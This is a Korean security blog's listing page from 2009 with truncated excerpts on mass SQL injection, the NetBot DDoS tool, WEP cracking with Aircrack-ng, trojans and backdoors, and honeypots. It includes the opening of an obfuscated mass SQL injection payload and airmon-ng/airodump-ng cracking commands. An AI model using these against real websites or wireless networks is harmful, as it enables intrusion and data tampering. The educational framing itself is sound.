해킹189 Mass SQL Injection 공격에서 배우기 다음은 요즘 유행하는 mass sql injection 공격의 일부 내용이다. ‘Mass Sql injection’ 공격은 중국으로부터 많이 발생하는 해킹기법으로 보통 DB접속을 통하는 Sql injection과 달리, 툴을 이용하여 한번의 공격으로 방대한 코드를 삽입하여 다량의 DB값을 변조시킴으로써 웹사이트에 치명적인 영향을 입힌다. 실제로 ASP를 사용하는 많은 기업들이 이 공격으로 인한 피해를 당했다고 설명했다. (참고 사이트와 책을 이용하면 더 많은 공부를 할 수 있을 것이다.) dEcLaRe @S VaRcHaR(4000) SeT @s=cAsT( DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.nam.. 2009. 2. 23. NetBot_Attack의 안티 웹나이트(Anti-WebKnight Attack) 2008년 9월 1일 소개된 'NetBot_Attack의 안티 웹나이트' 에 대한 보안뉴스 소식입니다. 웹나이트는 사용의 불편함과 보안의 취약성으로 인해 해커들의 지속적인 타켓이 되고 있으며, NetBot의 경우 현재 웹나이트를 무력화 시키는 기능(Anti-WebKnight Attack)을 포함하고 있습니다. 한국전용 DDoS 공격툴의 막강한 기능...국내 사이트 무방비 하지만 현재 ‘NetBot_Attack’ VIP 4.7버전까지 나온 상태이며 해당 웹 사이트는 어눌하지만 한국어로 번역이 된 상태로 서비스 되고 있다. 또 이들은 한국 사이트를 직접 공격한 테스트 내용을 올려놓고 있을 뿐만 아니라 기존 DDoS 공격과는 달리 원격제어 기능도 포함시키고 있어 감염된 좀비 서버와 PC를 원격에서 제어하는 등.. 2009. 2. 19. Aircrack 도구를 활용한 Wep Key Crack 하기 WEP 이란 wired Equivalent privacy 의 약자로 중요한것만 추리면무선네트워크에 사용 가능했던 첫 암호화 표준으로 rc4 알고리즘을 사용해서 암호화 하였다. 정도입니다.. WEP같은경우는 WEP를 사용하는 무선네트워크에서 암호화된 패킷이 150,000개 이상 돌아다닌다면 rc4알고리즘의 취약점으로인해 크랙이가능하고 인가되지 않은 사용자가 해당 네트워크로 들어올수있습니다.. WEP 크랙같은경우는 크게 5가지정도로 나뉩니다.. 요약 airmon-ng stop ath0 airmon-ng start wifi0 //모니터모드로 변경 airodump ath0 //공격할 AP 스캔 airodump-ng –c [해당채널] –w [캡쳐파일명] --bssid [타켓 AP맥주소] --ivs ath0 // .. 2009. 2. 16. 해킹 툴 (트로이목마,백도어,스니핑) 1. 트로이형 해킹 프로그램 가. 최근의 트로이목마 프로그램들 - 최근 유닉스 시스템뿐만 아니라 윈도우즈 시스템에서도 각종 트로이목마가 등장하고 있어 주의를 요한다. - 다음은 최근에 발견되고 있는 트로이목마들이다. l 인터넷 익스플로러(IE)의 거짓 업그레이드 - 마이크로소프트사의 IE 웹브라우저를 무료로 업그레이드하라는 내용의 전자 우편이 광범위하게 배포되고 있다. - 그러나 마이크로소프트사는 패치나 업그레이드를 전자우편을 통해서 제공하지 않고 전자우편을 통해서는 보안 게시(security bulletins)만을 한다고 발표했다. - 메일 메시지에는 Ie0199.exe라는 실행 프로그램이 첨부되어 있다. 사용자가 무심코 첨부된 Ie0199.exe 프로그램을 설치하여 실행하게 되면 그 프로그램은 몇몇 .. 2009. 2. 12. Solutions- Virtual PC로 Honeypot을 만들자 공격자가 올 것이다. (역자주 : 허니팟 - 실제로 자료를 가진 호스트인것 처럼 침입자를 속이는 최신 침입탐지기법으로 허니팟 시스템을 이용하면, 공격하거나 침입하는 해커를 유인할 수 있음) 허니팟(Honeypot)은 잠재적 공격자에 대한 조기 경고 제공, 보안 전략의 결점 파악, 그리고 조직 전체의 보안 의식을 향상시키기 위해 점차 사용되고 있다. 허니팟은 웹 서버, 메일 서버, 데이터베이스 서버, 응용 프로그램 서버, 그리고 방화벽까지도 포함하는 다양한 내, 외부 장비를 시뮬레이트할 수 있다. 소프트웨어 개발 관리자인 필자는 팀에서 개발한 방어해야할 소프트웨어와 운영체제의 취약점을 알기 위해 정기적으로 허니팟을 사용한다. 허니팟의 설치와 운영에는 네트워크 툴과 컴퓨터 법률 수사에 대한 몇몇 전문가뿐만 .. 2009. 2. 11. 이전 1 ··· 34 35 36 37 38 다음
